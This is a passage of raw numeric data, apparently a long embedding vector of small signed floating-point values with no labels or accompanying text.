-0.022252708673477173, -0.008677937090396881, -0.011684222146868706, 0.00882515124976635, 0.002837762702256441, -0.006492956075817347, -0.013729735277593136, 0.003814030671492219, 0.00046174178714863956, -0.016674036160111427, -0.007837262004613876, 0.012048385106027126, -0.002562703099101782, -0.005322984419763088, -0.007515713106840849, 0.0012949109077453613, 0.008701181039214134, -0.0032154854852706194, 0.0011176717234775424, -0.00033656059531494975, -0.006946223322302103, -0.022283701226115227, 0.011738458648324013, -0.002219847170636058, 0.00338981905952096, 0.021167967468500137, 0.009623211808502674, 0.013613512739539146, 0.010103597305715084, -0.007322009187191725, 0.045714132487773895, -0.04131317883729935, 0.007461476139724255, 0.01328034233301878, -0.03926766291260719, -0.008290529251098633, -0.01564352959394455, 0.003998049534857273, -0.014582033269107342, -0.02848222851753235, 0.021694840863347054, -0.009847908280789852, -0.004315723665058613, 0.0012697293423116207, 0.008437743410468102, -0.009259048849344254, -0.012071629986166954, 0.012644993141293526, 0.005907970480620861, -0.00023886117560323328, 0.02071857452392578, -0.022500650957226753, -0.015914715826511383, 0.02528998628258705, -0.011614488437771797, 0.004629524424672127, 0.002059072954580188, -0.015186388976871967, -0.009522485546767712, 0.014512299560010433, 0.015775248408317566, -0.010754442773759365, 0.017433354631066322, 0.015844982117414474, 0.01307889074087143, -0.023724859580397606, -0.004652768839150667, 0.004509427584707737, -0.014822226017713547, 0.00620240019634366, -0.001100238412618637, -0.014574284665286541, 0.013900195248425007, 0.017526332288980484, 0.023972800001502037, -0.009995123371481895, 0.0021268692798912525, -0.000488133926410228, -0.007662928197532892, 0.0009409168851561844, 0.022919051349163055, -0.013954431749880314, -0.007616438902914524, 0.0013743294402956963, -0.018843520432710648, 0.07345253229141235, -0.00024212992866523564, -0.01950986124575138, 0.0006532665574923158, -0.059598829597234726, -0.012939423322677612, -0.008275032043457031, -0.008213046938180923, -0.011064369231462479, -0.020982010290026665, 0.0014469684101641178, -0.016069678589701653, -0.021059492602944374, 0.03241829201579094, 0.002758344169706106, -0.008561714552342892, 0.0024232363793998957, -0.007659053895622492, 0.013404312543570995, 0.004679887089878321, 0.04806957021355629, 0.014318595640361309, 0.000836801016703248, -0.01529486384242773, -0.006159785203635693, -0.006768015678972006, -0.023957304656505585, 0.0027719035279005766, -0.036788251250982285, 0.013086638413369656, -0.005691021680831909, -0.016255635768175125, -0.018332140520215034, -0.0035002303775399923, -0.017526332288980484, -0.019788794219493866, -0.002072632312774658, -0.013752980157732964, -0.0013045960804447532, 0.004699257668107748, -0.011265821754932404, -0.02071857452392578, -0.009073092602193356, -0.021167967468500137, 0.00634186714887619, 0.01332683116197586, 0.003734612138941884, -0.017960229888558388, -0.026622669771313667, 0.012335066683590412, 0.008608203381299973, 0.016162656247615814, 0.0040406640619039536, 0.009700693190097809, 0.0017568947514519095, 0.01408615056425333, 0.00043583387741819024, -0.013497291132807732, -0.021849805489182472, -0.04190203547477722, 0.025956328958272934, -0.004129767883569002, 0.016488078981637955, 0.006810630671679974, -0.00991764198988676, -0.0006585934315808117, 0.004459064919501543, 0.011056621558964252, -0.02921055443584919, -0.011769451200962067, -0.004431946203112602, -0.004737998358905315, 0.03138003870844841, 0.0012319571105763316, 0.0015660964418202639, -0.0006915230769664049, 0.015620285645127296, 0.024019289761781693, -0.019060468301177025, -0.020331166684627533, 0.0029055592603981495, -0.025661898776888847, -0.0075079649686813354, 0.009088588878512383, -0.015535056591033936, 0.013094387017190456, 0.013179616071283817, 0.02198927104473114, -0.023569896817207336, -0.0005859544035047293, 0.00791086908429861, 0.016240138560533524, 0.022655613720417023, -0.01950986124575138, -0.02191179059445858, 0.019168943166732788, -0.005962207447737455, -0.0007433388964273036, 0.043296705931425095, 0.007132179103791714, -0.008244039490818977, -0.003370448714122176, 0.011513762176036835, -0.03418487310409546, 0.01176170352846384, -0.017867252230644226, 0.02304302155971527, -0.003889575134962797, 0.00115834956523031, 0.015666775405406952, -0.008546218276023865, 0.014930699951946735, 0.024375705048441887, 0.030357282608747482, 0.004598531406372786, -0.011901170015335083, 0.0021210582926869392, -0.019633831456303596, 0.01676701381802559, 0.004842598456889391, -0.008592707104980946, 0.011141850613057613, 0.008972366340458393, 0.026684654876589775, 0.007256149780005217, 0.006756393704563379, 0.0006963656633161008, 0.032542262226343155, -0.012660489417612553, 0.029427502304315567, -0.004571413155645132, -0.00024079821014311165, -0.019060468301177025, -0.038244906812906265, -0.007972854189574718, -0.0067137787118554115, 0.022407671436667442, -0.005454703234136105, -0.023647377267479897, 0.0050401766784489155, -0.012071629986166954, -0.013350076042115688, -0.013520535081624985, 0.006423222832381725, -0.010645968839526176, 0.010878413915634155, -0.00943725649267435, -0.01685999147593975, -0.026932597160339355, 0.0038721419405192137, 0.004435820505023003, 0.012164607644081116, 0.0015099222073331475, 0.0014140388229861856, 0.0019234801875427365, -0.025506936013698578, -0.0038198416586965322, -0.01039802748709917, -0.010181079618632793, 0.029164066538214684, -0.004218871705234051, -0.016550064086914062, -0.007934113964438438, -0.017588317394256592, -0.023802340030670166, -0.021152470260858536, -0.02454616315662861, -0.03186042606830597, 0.0075273350812494755, 0.011777199804782867, 0.006632423028349876, 0.008716677315533161, 0.002204350894317031, 0.003945749253034592, -0.005574799608439207, 0.005187391769140959, 0.0035932082682847977, -0.013590268790721893, 0.006035814993083477, 0.01267598569393158, -0.011815940961241722, 0.033812958747148514, -0.001963189570233226, 0.02175682783126831, 0.015573796816170216, -0.011335554532706738, 0.008522973395884037, 0.009654204361140728, -0.005946711171418428, 0.01637960597872734, -0.001303627504967153, 0.008980114944279194, -0.008445492014288902, 0.0006736054783686996, -0.029969874769449234, -0.011676473543047905, -0.012753468006849289, -0.005768503528088331, -0.014946196228265762, 0.014582033269107342, 0.0020242061000317335, -0.0021384914871305227, 0.020486129447817802, -0.0011118606198579073, 0.022407671436667442, -0.008011595346033573, 0.00894137378782034, 0.005435332655906677, 0.014543292112648487, 0.006004822440445423, 0.017293887212872505, -0.00618303008377552, 0.00569489598274231, 0.03266623243689537, 0.020966514945030212, 0.016736021265387535, 0.015798494219779968, -0.005516688339412212, -0.01403966173529625, 0.003416937543079257, -0.005780125502496958, 0.015139900147914886, -0.0007985444972291589, -0.0018876449903473258, -0.010297301225364208, -0.0061714076437056065, 0.014062906615436077, 0.008569462224841118, -0.019540853798389435, -0.009824664331972599, -0.013032400980591774, -0.015000433661043644, -0.010111345909535885, 0.00959221925586462, 0.006163659505546093, -0.0038740788586437702, 0.0009946697391569614, 0.005202888045459986, -0.00023643988242838532, 0.0069346013478934765, 0.006624674890190363, -0.004056160803884268, -0.015310360118746758, -0.005218384321779013, -0.0011486643925309181, 0.019463371485471725, 0.01288518588989973, -0.015186388976871967, -0.006388355977833271, 0.01111860666424036, 0.005109909921884537, -0.014334091916680336, -0.00246778829023242, 0.011087614111602306, 0.011521510779857635, 0.010893910191953182, -0.02439120039343834, 0.0073994905687868595, -0.005508940201252699, -0.0035893339663743973, -0.01540333777666092, -0.006210148334503174, 0.01376847643405199, 0.00511765806004405, -0.006198526360094547, -0.005904096178710461, -0.008577210828661919, -0.022578131407499313, -0.015666775405406952, -0.0067292749881744385, 0.0017636744305491447, -0.0004806279030162841, -0.022655613720417023, -0.007612565066665411, 0.0024735992774367332, -0.013814965263009071, 0.008445492014288902, 0.005226132459938526, 0.00571814039722085, -0.005129280500113964, -0.01933940127491951, 0.022531643509864807, -0.003341393079608679, 0.0004641630803234875, 0.01090940646827221, -0.003126381663605571, 0.017371369525790215, 0.002270210301503539, -0.0022430915851145983, -0.00011930952314287424, 0.002252776874229312, -0.002028080401942134, -0.008577210828661919, -0.010583983734250069, -0.005594169721007347, 0.0039244419895112514, -0.024453185498714447, 0.0018150059040635824, 0.014179129153490067, 0.008600454777479172, 0.0009641613578423858, -0.018998483195900917, -0.001137042185291648, -0.004118145909160376, -0.022888058796525, 0.023012029007077217, -0.019463371485471725, -0.016255635768175125, -0.002237280597910285, -0.003223233623430133, 0.04050736874341965, -0.01613166369497776, -0.0020668210927397013, -0.00043268618173897266, -0.020331166684627533, -0.011079865507781506, -0.005814992357045412, -0.017045946791768074, 0.0019380080047994852, -0.008763166144490242, 0.021787820383906364, -0.00415301276370883, -0.0066169267520308495, -0.01637960597872734, 0.0012677923077717423, 0.042180970311164856, -0.009189315140247345, -0.006988838315010071, -0.019277416169643402, 0.008058084174990654, 0.01111860666424036, -0.0029520480893552303, -0.003325896803289652, -0.010436768643558025, -0.013264846056699753, 0.014868714846670628, -0.013938935473561287, -0.013574772514402866, -0.021291937679052353, 0.006764141842722893, -0.006880363915115595, -0.017634807154536247, 0.016488078981637955, 0.0015622222563251853, 0.010049360804259777, 0.0010469697881489992, -0.03492869436740875, 0.016550064086914062, -0.0018518096767365932, -0.006543319206684828, -0.004830976482480764, 0.021167967468500137, -0.0016890984261408448, -0.007589320652186871, 0.04075530916452408, -0.010405776090919971, -0.02625075913965702, 0.010924902744591236, 0.004993687849491835, -0.018518097698688507, -0.0049626948311924934, -0.0021869174670428038, 0.00042832785402424634, -0.026932597160339355, 0.006868741940706968, 0.028916124254465103, 0.005028554238379002, -0.005749132949858904, 0.0032464780379086733, 0.005679399706423283, 0.010963642969727516, 0.001785950385965407, 0.009537981823086739, 0.00010792941611725837, -0.013652253895998001, -0.008414499461650848, 0.0008188834181055427, 0.01159124355763197, -0.017851755023002625, 0.019447876140475273, 0.004904584027826786, -0.015705516561865807, -0.0010798994917422533, 0.017758777365088463, -0.0006290535675361753, -0.01095589529722929, 0.00786050595343113, 0.012428045272827148, 0.0070624458603560925, -0.0126372454687953, -0.004300227388739586, -0.01236606016755104, 0.002692484762519598, -0.008538469672203064, -0.0154420780017972, -0.011289065703749657, -0.008964618667960167, -0.006051311269402504, -0.005896348040550947, 0.008755418471992016, -0.00013861939078196883, 0.008522973395884037, -0.007345253601670265, -0.010258561000227928, -0.031178586184978485, 0.006775763817131519, -0.018828023225069046, -0.0013104071840643883, 0.005760755389928818, 0.02189629338681698, -0.027072062715888023, 0.023414932191371918, 0.0037384862080216408, 0.011862429790198803, -0.04029041901230812, -0.010545242577791214, 0.008608203381299973, 0.006407726556062698, 0.009483745321631432, 0.008856144733726978, -0.0034033781848847866, 0.0224696584045887, 0.02279507927596569, -0.0026053180918097496, 0.0028067701496183872, 0.00634186714887619, 0.015744255855679512, 0.012892934493720531, 0.010343790985643864, 0.00939076766371727, -0.026607174426317215, -0.0011312310816720128, -0.0022547137923538685, -0.015628034248948097, 0.0033820709213614464, 0.021152470260858536, -0.005047924816608429, 0.0176657997071743, 0.01701495423913002, 0.004606280010193586, 0.016643043607473373, 0.02680862508714199, -0.025940831750631332, 0.0062837558798491955, 0.004110397771000862, -0.025537928566336632, -0.012490030378103256, -0.019618336111307144, -0.0068571195006370544, 0.005512814037501812, 0.01757282204926014, 0.017944732680916786, -0.01127356942743063, -0.000024909117200877517, -0.0026847366243600845, 0.004586909431964159, -0.005811118520796299, 0.0018033836968243122, -0.007050823420286179, 0.03122507594525814, -0.0011225143680348992, 0.01500818133354187, -0.002988851862028241, -0.016999458894133568, 0.012063881382346153, -0.01950986124575138, 0.040817294269800186, -0.01741785928606987, 0.021043997257947922, -0.01066921278834343, 0.011064369231462479, -0.014272106811404228, -0.0032542261760681868, 0.01958734355866909, -0.007550579961389303, -0.002146239625290036, 0.0020358285401016474, -0.0029520480893552303, -0.010762191377580166, -0.008708929643034935, 0.00465664267539978, 0.02045513689517975, 0.0361064150929451, 0.0037791640497744083, -0.006547193508595228, -0.00770166888833046, -0.015263870358467102, -0.01613166369497776, -0.007015957031399012, -0.0028881258331239223, 0.0006280850502662361, 0.028947116807103157, -0.005567051470279694, 0.010328294709324837, -0.01734037697315216, 0.0077210390008986, -0.032542262226343155, -0.0007365592755377293, 0.004699257668107748, -0.001726870657876134, 0.0013423683121800423, -0.005458577070385218, -0.0053733475506305695, 0.04245990514755249, -0.0039089457131922245, -0.0038740788586437702, 0.008863892406225204, 0.017634807154536247, -0.011475021950900555, 0.003267785534262657, 0.006128792650997639, -0.024778608232736588, -0.004052286501973867, -0.0036435711663216352, -0.016100671142339706, -0.027072062715888023, 0.009940885938704014, -0.00447456119582057, -0.022826071828603745, 0.023166991770267487, -0.02400379255414009, 0.0017123428406193852, 0.010374783538281918, 0.01966482400894165, 0.01176170352846384, 0.00019503565272316337, 0.004784487187862396, 0.006117170676589012, -0.004648894537240267, -0.016240138560533524, 0.020641092211008072, -0.020005743950605392, 0.001051812432706356, 0.0024581030011177063, -0.009778175503015518, -0.006686659995466471, -0.005288117565214634, 0.024608148261904716, -0.01127356942743063, 0.01035928726196289, -0.00927454512566328, -0.010924902744591236, -0.01556604914367199, 0.0004997561918571591, -0.012056133709847927, -0.001872148597612977, -0.03164347633719444, 0.0026518069207668304, -0.004083279054611921, 0.012908430770039558, -0.001426629489287734, -0.022252708673477173, -0.01472924742847681, -0.011095361784100533, -0.016999458894133568, -0.004590783268213272, 0.0025781996082514524, -0.016658538952469826, 0.027831383049488068, -0.003814030671492219, 0.0051680211909115314, 0.0008769946289248765, 0.008530721999704838, 0.01734037697315216, -0.007353001739829779, 0.02623526193201542, -0.004412575624883175, 0.006279882043600082, -0.01393118780106306, -0.009336530230939388, -0.000643581326585263, 0.0030159703455865383, -0.020672084763646126, 0.017200909554958344, 0.004168509040027857, -0.0009840159909799695, -0.01300140842795372, -0.031271565705537796, -0.009491492994129658, 0.021291937679052353, -0.0033568893559277058, 0.005574799608439207, -0.006690534297376871, -0.0039283158257603645, -0.0035641526337713003, -0.015209633857011795, 0.0016803817125037313, -0.029164066538214684, 0.019044971093535423, -0.006031940691173077, -0.000927841872908175, 0.008646943606436253, 0.01220334880053997, -0.013791720382869244, -0.006744771264493465, 0.000012250261534063611, -0.010374783538281918, -0.02759893797338009, 0.023740354925394058, 0.01862657070159912, 0.014984937384724617, -0.011815940961241722, 0.004083279054611921, 0.005714266560971737, -0.004540420603007078, -0.013055645860731602, 0.02617327682673931, -0.005981577560305595, -0.003970930818468332, -0.004230494145303965, -0.003905071411281824, -0.00047287976485677063, 0.039298657327890396, 0.03908170759677887, -0.005199013743549585, -0.0012794145150110126, 0.0005375284235924482, 0.0160541832447052, 0.012482281774282455, -0.006578186061233282, 0.004877465311437845, 0.00022505977540276945, 0.02045513689517975, -0.0034905450884252787, 0.019773298874497414, -0.004823228344321251, -0.007542831357568502, -0.006070681381970644, 0.007198038510978222, 0.008732173591852188, -0.0048348503187298775, -0.01780526712536812, 0.02279507927596569, 0.013179616071283817, 0.004830976482480764, -0.017526332288980484, -0.015535056591033936, -0.012776711955666542, 0.003982553258538246, 0.028761161491274834, 0.001925417222082615, 0.0024852214846760035, -0.0003588365507312119, 0.018750540912151337, -0.0011341365752741694, 0.025336476042866707, -0.00846098829060793, -0.003920567687600851, -0.010932650417089462, -0.0009820789564400911, -0.008166558109223843, 0.023383939638733864, 0.02711855247616768, -0.03097713552415371, 0.014876462519168854, 0.0013607701985165477, -0.01328034233301878, -0.00553605891764164, -0.014163631945848465, -0.004358338657766581, -0.0037113674916327, 0.011079865507781506, -0.006330244708806276, -0.005644532851874828, -0.01989726908504963, 0.0015012056101113558, 0.002076506381854415, 0.01219560019671917, -0.003201926127076149, 0.022934546694159508, 0.012559764087200165, -0.028048330917954445, -0.0033297708723694086, -0.030837668105959892, -0.005133154336363077, -0.011684222146868706, 0.010491005145013332, 0.015674524009227753, -0.02663816697895527, -0.0020183951128274202, -0.009894397109746933, -0.0038527713622897863, -0.00021610096155200154, -0.01360576506704092, -0.019866276532411575, -0.02304302155971527, -0.008964618667960167, 0.000437044509453699, -0.01452004723250866, 0.0004544778785202652, 0.004505553748458624, 0.007845009677112103, 0.005923466756939888, -0.00372298969887197, -0.00911183375865221, -0.011831437237560749, -0.0010934587335214019, -0.00975493062287569, -0.01716991700232029, -0.01622464321553707, -0.0019186375429853797, -0.015558300539851189, -0.016968466341495514, -0.008158810436725616, -0.03275921195745468, 0.0035583414137363434, -0.0018750542076304555, 0.012459037825465202, -0.002886188682168722, 0.0043389685451984406, -0.024577155709266663, 0.021648352965712547, -0.01560478936880827, 0.017107931897044182, -0.0004012092831544578, -0.002028080401942134, -0.005985451862215996, 0.003949623554944992, -0.007143801543861628, 0.002498780842870474, -0.016627546399831772, -0.010901657864451408, 0.007759780157357454, 0.0046915095299482346, -0.01822366751730442, -0.00818205438554287, 0.046179018914699554, 0.00680288253352046, -0.002188854617998004, 0.015837235376238823, 0.028993606567382812, -0.012102622538805008, -0.002864881418645382, 0.012443541549146175, 0.002591758733615279, -0.021663848310709, 0.01345080230385065, -0.022919051349163055, -0.011211584322154522, 0.0040367902256548405, 0.005253251176327467, 0.00839125458151102, -0.022175228223204613, -0.0188745129853487, -0.009506989270448685, -0.017929237335920334, -0.01782076247036457, 0.010320546105504036, 0.000003155255626552389, 0.02102850005030632, -0.006334119010716677, 0.013295838609337807, -0.000649392488412559, 0.02150888554751873, 0.018921000882983208, 0.005268747452646494, 0.021865300834178925, 0.0009985438082367182, 0.025088535621762276, 0.003453741315752268, -0.012714726850390434, -0.015473071485757828, 0.010328294709324837, -0.01788274757564068, 0.0026324365753680468, -0.014124891720712185, 0.004904584027826786, 0.005981577560305595, -0.0007743315072730184, -0.008801907300949097, 0.012319570407271385, -0.0188590157777071, -0.01958734355866909, 0.002101687714457512, -0.011676473543047905, 0.010622723959386349, 0.008677937090396881, -0.00744597939774394, -0.004858094733208418, -0.0001328082726104185, -0.013698742724955082, 0.004137516021728516, 0.006148163229227066, 0.01847160793840885, -0.006698282435536385, -0.01155250333249569, -0.009414011612534523, -0.020036736503243446, 0.03740810602903366, 0.012706979177892208, 0.006973342038691044, -0.000643581326585263, -0.0016280816635116935, 0.005241628736257553, 0.005749132949858904, -0.01670502871274948, -0.023740354925394058, 0.01620914600789547, -0.008584958501160145, -0.012048385106027126, 0.0011922477278858423, 0.018487105146050453, -0.006399978417903185, -0.00894137378782034, -0.006217896472662687, 0.007798520848155022, 0.0015864352462813258, 0.013683246448636055, 0.012350563891232014, -0.002973355585709214, 0.0033975671976804733, 0.008530721999704838, -0.0057103922590613365, -0.011033376678824425, -0.014458062127232552, -0.0005128312041051686, 0.01596120558679104, -0.000976752140559256, -0.019695816561579704, -0.007798520848155022, 0.009290041401982307, 0.006957845762372017, 0.01989726908504963, -0.01420237310230732, 0.0038585825823247433, -0.012257585301995277, 0.009212560020387173, 0.0029210555367171764, -0.007767528295516968, 0.0200522318482399, -0.008429995737969875, 0.01981978677213192, -0.016007693484425545, -0.0016668224707245827, -0.009491492994129658, -0.013063393533229828, -0.01751083694398403, 0.0005598043790087104, -0.022733094170689583, -0.005326858256012201, -0.017200909554958344, 0.01751083694398403, 0.006682786159217358, 0.0005200951127335429, -0.02302752435207367, 0.007500216830521822, 0.00043050700332969427, 0.019044971093535423, -0.01692197658121586, -0.0033627005759626627, -0.005679399706423283, -0.010010619647800922, 0.0160386860370636, 0.014977188780903816, 0.001502174069173634, -0.00002542364200053271, -0.015635782852768898, -0.006109422538429499, -0.0010053234873339534, -0.008368010632693768, -0.02237667888402939, 0.007085690274834633, -0.007225157227367163, 0.001749146613292396, -0.001109923585318029, -0.002113309921696782, -0.01613166369497776, -0.011815940961241722, 0.003932190127670765, -0.02752145566046238, 0.0007447916432283819, 0.0016174279153347015, 0.01991276629269123, -0.00324066705070436, -0.01288518588989973, -0.024220740422606468, -0.0017927299486473203, 0.01862657070159912, -0.000949633598793298, 0.018657563254237175, -0.0003036309208255261, -0.013357823714613914, 0.013985424302518368, 0.008158810436725616, -0.015690019354224205, -0.0029423628002405167, 0.010088101029396057, -0.015031426213681698, -0.000015186086784524377, -0.011304561980068684, 0.004939450416713953, -0.017712289467453957, 0.04022843390703201, 0.013187364675104618, 0.016007693484425545, -0.00012687608250416815, -0.006163659505546093, -0.0032794077415019274, 0.005993200000375509, -0.0010469697881489992, -0.008522973395884037, 0.006833875086158514, 0.004881339613348246, 0.013187364675104618, -0.019804291427135468, -0.005330732557922602, -0.019153445959091187, 0.0007690046331845224, 0.01774328202009201, -0.00947599671781063, 0.014016417786478996, -0.006810630671679974, 0.02471662312746048, 0.01837863028049469, -0.030713697895407677, -0.004683761391788721, -0.017634807154536247, 0.009220307692885399, 0.008863892406225204, -0.0029423628002405167, -0.0052803694270551205, 0.009243552573025227, -0.0176657997071743, 0.004606280010193586, 0.007298764772713184, -0.010367034934461117, -0.004350590519607067, 0.007848883979022503, 0.002516214270144701, -0.011374295689165592, 0.014465810731053352, 0.012892934493720531, 0.008050335571169853, 0.009142826311290264, 0.014117143116891384, 0.015434330329298973, 0.011420784518122673, 0.032387297600507736, -0.016720524057745934, -0.0032542261760681868, 0.007631935179233551, 0.010088101029396057, -0.028063828125596046, 0.0017723911441862583, 0.0017714225687086582, -0.02175682783126831, -0.0016125853871926665, 0.02014520950615406, 0.038244906812906265, -0.0008392223389819264, -0.015015929937362671, 0.012118118815124035, 0.007724913302809, 0.02215973101556301, -0.005082791671156883, 0.02093552239239216, -0.0021849805489182472, 0.023616384714841843, -0.0006174313020892441, 0.004118145909160376, -0.0009559289901517332, 0.0021752952598035336, -0.009491492994129658, 0.013946684077382088, 0.0108396727591753, -0.005067295394837856, -0.006299252156168222, 0.019323905929923058, 0.012776711955666542, 0.008368010632693768, 0.022268205881118774, 0.0027215403970330954, -0.03179844096302986, -0.013690995052456856, 0.03122507594525814, -0.0055825477465987206, -0.007593194488435984, -0.01628662832081318, 0.009762679226696491, -0.012428045272827148, 0.009522485546767712, -0.0001324450713582337, -0.004288605414330959, -0.005652280990034342, 0.017774274572730064, -0.005904096178710461, 0.006113296374678612, 0.0013559275539591908, 0.020191699266433716, -0.009197062812745571, 0.015225130133330822, 0.01799122244119644, 0.007318134885281324, 0.0022895806469023228, -0.010862916707992554, 0.01596120558679104, 0.002847447991371155, -0.027986345812678337, -0.011870177462697029, 0.006024192553013563, 0.012614000588655472, -0.002601444022729993, -0.01797572523355484, -0.01636410877108574, -0.004400953650474548, -0.000756413908675313, 0.007291016634553671, -0.0055825477465987206, 0.015364596620202065, 0.011854681186378002, 0.030388275161385536, -0.002694421913474798, 0.004447442479431629, -0.02304302155971527, 0.008863892406225204, -0.0046140281483531, 0.0015670649008825421, -0.009142826311290264, -0.00645808968693018, 0.0069191050715744495, 0.012149111367762089, 0.0148454699665308, -0.011839184910058975, 0.006388355977833271, 0.005706517957150936, -0.017247399315238, -0.007612565066665411, 0.012249837629497051, 0.0007457601604983211, -0.008879388682544231, 0.0047999839298427105, 0.008329269476234913, -0.01797572523355484, -0.015527307987213135, -0.024856090545654297, -0.0015699705109000206, -0.0020474507473409176, -0.0018111318349838257, -0.02665366232395172, 0.004300227388739586, 0.0009191252174787223, 0.027010077610611916, -0.019153445959091187, 0.015302611514925957, 0.016736021265387535, -0.03347204253077507, -0.037191156297922134, -0.0188590157777071, -0.004753494635224342, 0.0030934519600123167, -0.004869717173278332, 0.016581058502197266, -0.0031806188635528088, 0.005601917859166861, 0.0017878874205052853, -0.0033278337214142084, 0.002795147942379117, -0.0007975759799592197, 0.008871641010046005, -0.00293848873116076, -0.015628034248948097, -0.009119581431150436, 0.004807732068002224, -0.020160706713795662, -0.004005797673016787, 0.0033878819085657597, 0.009367522783577442, 0.00602031871676445, 0.011366547085344791, -0.019711313769221306, -0.02986139990389347, -0.011831437237560749, -0.02904009446501732, 0.0014498740201815963, 0.001673602033406496, 0.003486671019345522, -0.0071747940964996815, -0.0009617400937713683, -0.008491980843245983, 0.0019244486466050148, 0.00602031871676445, 0.019881771877408028, -0.003482796950265765, 0.015635782852768898, -0.0008213047403842211, 0.007817891426384449, 0.013985424302518368, -0.009080841206014156, 0.03644733503460884, 0.016596553847193718, -0.009677449241280556, -0.004645020700991154, -0.03065171279013157, 0.012939423322677612, 0.0040367902256548405, 0.009530234150588512, -0.01283869706094265, -0.006117170676589012, -0.030109340324997902, 0.006733149290084839, 0.009956383146345615, -0.030062852427363396, -0.008205299265682697, -0.010769939050078392, -0.001330746104940772, -0.01895199343562126, 0.016271131113171577, 0.0016929724952206016, 0.017386866733431816, 0.008081328123807907, -0.03564152494072914, 0.008112321607768536, 0.005911844316869974, 0.008313773199915886, 0.0021752952598035336, -0.019850779324769974, 0.010142338462173939, 0.01403966173529625, -0.0037791640497744083, 0.007457601837813854, -0.0065084523521363735, -0.036633290350437164, 0.009158322587609291, 0.006516200490295887, 0.027660923078656197, 0.001002417877316475, 0.0028028960805386305, 0.01813068985939026, 0.00975493062287569, 0.010157834738492966, 0.0027912738732993603, -0.006992712151259184, -0.0042459904216229916, -0.00445131678134203, -0.007941861636936665, -0.0016639168607071042, 0.012482281774282455, -0.012381556443870068, 0.0019612524192780256, -0.008437743410468102, -0.007074067834764719, 0.010762191377580166, 0.009537981823086739, 0.01910695619881153, -0.02463914081454277, -0.015914715826511383, -0.01999024674296379, 0.021601863205432892, 0.013094387017190456, -0.02141590788960457, -0.009615464136004448, -0.005446955095976591, 0.005648407153785229, 0.016100671142339706, -0.005051798652857542, -0.005086665507405996, -0.009700693190097809, 0.017386866733431816, -0.016007693484425545, 0.0028726295568048954, -0.017448851838707924, 0.01540333777666092, 0.0017365558305755258, -0.015015929937362671, -0.00834476575255394, 0.022361183539032936, -0.01581398956477642, -0.023166991770267487, -0.01853359304368496, -0.03260424733161926, 0.00493557658046484, -0.011986400000751019, 0.007294890470802784, 0.0041646347381174564, 0.0004225167213007808, 0.01918443851172924, 0.01359801646322012, 0.03097713552415371, 0.011366547085344791, -0.017278391867876053, 0.023771347478032112, 0.0256773941218853, 0.01950986124575138, 0.0032542261760681868, 0.007678424473851919, 0.012730223126709461, -0.009685196913778782, 0.011227080598473549, 0.01774328202009201, 0.015039173886179924, 0.015093411318957806, 0.009940885938704014, 0.007577698212116957, 0.017557324841618538, -0.007136053405702114, 0.005237754434347153, 0.006229518912732601, 0.011219331994652748, 0.005907970480620861, 0.0051525249145925045, 0.009599967859685421, -0.005106036085635424, 0.01991276629269123, 0.014938448555767536, -0.0007292953669093549, -0.004741872660815716, 0.001356896129436791, -0.016240138560533524, 0.0061714076437056065, 0.0058227404952049255, 0.011939911171793938, -0.014186876825988293, -0.003938001114875078, 0.015542804263532162, -0.0015370408073067665, 0.014628522098064423, -0.007023705169558525, -0.014388329349458218, 0.00555930333212018, -0.02053261734545231, 0.02575487643480301, 0.0063767340034246445, 0.014155884273350239, -0.006632423028349876, -0.01002611592411995, -0.007523461245000362, 0.030217815190553665, 0.0006271165329962969, -0.01958734355866909, -0.011041124351322651, -0.011033376678824425, 0.009042100049555302, -0.005768503528088331, -0.005443080794066191, -0.0023689991794526577, -0.0002912823110818863, 0.0016222705598920584, -0.015093411318957806, 0.006566563621163368, -0.005412088241428137, 0.016503576189279556, 0.004307975526899099, -0.009018855169415474, 0.031178586184978485, 0.015248374082148075, -0.012249837629497051, 0.010212072171270847, -0.013845957815647125, 0.026591677218675613, -0.000633411924354732, -0.01107211783528328, -0.009669700637459755, 0.011537007056176662, -0.0027525329496711493, -0.032635241746902466, 0.01359801646322012, -0.009049848653376102, -0.0012677923077717423, 0.01035928726196289, 0.013241601176559925, -0.012164607644081116, 0.017216406762599945, -0.03162797912955284, 0.013047897256910801, 0.0102353161200881, 0.010738946497440338, 0.016240138560533524, 0.005791747942566872, -0.008561714552342892, 0.010274057276546955, 0.007376246154308319, -0.011451777070760727, -0.0025781996082514524, 0.018115192651748657, -0.010870665311813354, 0.0033452671486884356, -0.01741785928606987, -0.00038643938023597, -0.007108934689313173, 0.012598504312336445, 0.016813501715660095, -0.003120570443570614, -0.020641092211008072, 0.006055185105651617, 0.014241114258766174, 0.005001435987651348, -0.013388816267251968, -0.019137948751449585, 0.021927285939455032, -0.007236779201775789, -0.008887137286365032, 0.0012251774314790964, 0.0013646442675963044, -0.009398515336215496, 0.013233853504061699, -0.01703045144677162, 0.011219331994652748, 0.0005694896099157631, 0.006434844806790352, 0.009584471583366394, 0.032945167273283005, 0.01909146085381508, -0.00013547169510275126, -0.013373319990932941, 0.004726376384496689, 0.014465810731053352, -0.011668725870549679, -0.00601644441485405, -0.018797030672430992, 0.002033891389146447, -0.007755905855447054, -0.0030798926018178463, 0.027025574818253517, 0.026188774034380913, 0.00846098829060793, -0.015945708379149437, -0.01295491959899664, -0.0053423549979925156, 0.005888599902391434, 0.011172843165695667, 0.0216793455183506, -0.012187852524220943, -0.011048872955143452, 0.011629984714090824, -0.0006091988761909306, -0.011343303136527538, 0.0026634291280061007, 0.007434357423335314, -0.00261694029904902, 0.01472924742847681, 0.027072062715888023, -0.009940885938704014, 0.022841569036245346, -0.00942950788885355, -0.013427557423710823, -0.003786912187933922, 0.02504204586148262, 0.016023190692067146, 0.016178153455257416, 0.010537494905292988, -0.012923927046358585, 0.003792723175138235, 0.016798006370663643, 0.0021578618325293064, 0.0038818269968032837, 0.002446480793878436, -0.004978191573172808, -0.008701181039214134, 0.01236606016755104, 0.006109422538429499, 0.022903554141521454, 0.012552015483379364, 0.006035814993083477, -0.02360088936984539, -0.002946237102150917, 0.015372345224022865, 0.020160706713795662, -0.004687635228037834, 0.005446955095976591, -0.012528771534562111, 0.01127356942743063, -0.009514737874269485, -0.010258561000227928, 0.012567511759698391, 0.006551067344844341, -0.007097312714904547, 0.0021443027071654797, -0.004455190617591143, -0.0030760185327380896, 0.011978652328252792, 0.0007380120223388076, 0.0016639168607071042, 0.018905505537986755, 0.013357823714613914, -0.010855169035494328, 0.00022445444483309984, 0.0022721472196280956, -0.00680288253352046, -0.008453239686787128, 0.006706030573695898, 0.006272133905440569, -0.0026537440717220306, -0.004734124522656202, 0.013249349780380726, -0.006287630181759596, -0.0027719035279005766, -0.013660002499818802, -0.0032929670996963978, 